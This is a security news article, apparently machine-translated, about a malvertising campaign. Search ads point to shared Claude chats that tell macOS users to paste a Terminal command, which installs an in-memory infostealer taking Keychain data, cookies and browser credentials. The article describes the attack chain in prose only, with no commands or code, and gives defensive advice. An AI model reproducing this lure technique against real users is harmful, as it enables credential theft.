malicious ads in Claude AI and shared chats that deceive to steal credentials in MacOS

An active campaign is exploiting two vectors that people tend to trust: sponsored search engine ads and sharing functions on IA platforms. Instead of redirecting to a false domain, attackers place ads that point to claude.ai and host within the shared chats malicious instructions that induce the user to paste a command into Terminal; that command downloads and runs a compressed and osfuscated script that runs in memory and steals credentials and system data in macOS.

The technique combines social engineering and abuse of trust in legitimate services: the announcement seems legitimate because it shows as destination the real domain of Anthropic, and the malicious content lives within a public conversation of Claude. The finding was brought to light by a researcher at LinkedIn, which also shows how easy it is for a malicious actor to reuse legitimate infrastructure to distribute payloads without the need to create an easily detectable website ( publication of the researcher).

Technically, the scripts that order to paste in Terminal recover a first charger, decompress it and run in memory, perform a host fingerprint (external IP, macOS version, keyboard distribution) and then download a second stage that runs via osascript. In observed variants it was found that delivery to machines with keyboards from certain regions is filtered, while in others the payload is behaved as a MacSync type infostealer and exfiltra cookies, browser credentials and Keychain content. Some of these artifacts are publicly documented in analysis repositories such as VirusTotal ( sample example in VirusTotal).

This attack highlights an uncomfortable truth: the legitimacy of the destination domain is no longer a guarantee of security. When platforms allow publicly shared content and search engines allow paid ads that lead to these content, attackers get a powerful combination: mass visibility and confidence appearance. In addition, "fileless" in memory and the use of osascript make it difficult to detect by traditional methods that focus on disk artifacts.

For private users, the practical recommendation is clear and urgent: do not paste commands in Terminal that come from search results, ads or shared chats. If you need to install a native application, go directly to the official supplier's website and follow the installation documentation published on your institutional site - for example, always check the documentation on Anthropic's website before running Claude related tools ( Anthropic). In addition, it activates the authentication of two factors and, whenever possible, uses physical security keys (WebAuthn) for critical accounts.

For company security officials and system managers, this incident requires layer defense measures: blocking and filtering suspicious domains in the DNS, EDR rules that alert about osascript executions, monitoring of processes that decipher / execute memory content and detection of outgoing traffic to exfiltration infrastructures. It is also advisable to apply MDM policies that limit the execution of scripts by non-administrative users and educate templates about the risk of hitting commands without verifying their origin.

If you think you have followed malicious instructions, disconnect the device from the network, do not use that equipment to recover accounts, and from a clean computer changes passwords, revokes tokens and active sessions, and reviews alerts of unusual accesses. It also considers conducting a forensic analysis or restoring from a confidence backup; the expulsion of actors who have had access to Keychain or session cookies may require a rotation of credentials and a revision of certificates or tokens.

Finally, it is essential that platforms and advertisers strengthen controls: ad systems need more stringent signals to identify destinations that take advantage of user-generated content to distribute executable instructions, and IA platforms should improve mechanisms to quickly remove shared chats containing dangerous commands. In the meantime, all users must adopt operational scepticism in the event of technical instructions from unverified sources and to report any suspicious notice or resource to the platform owners and the search engine.

The report published by safety researchers on BleepingComputer ( in BleepingComputer) and sample entries in malware analysis services like VirusTotal ( alternative sample in VirusTotal), and recalls to report any suspicious ad or chat to the relevant platforms to accelerate its mitigation.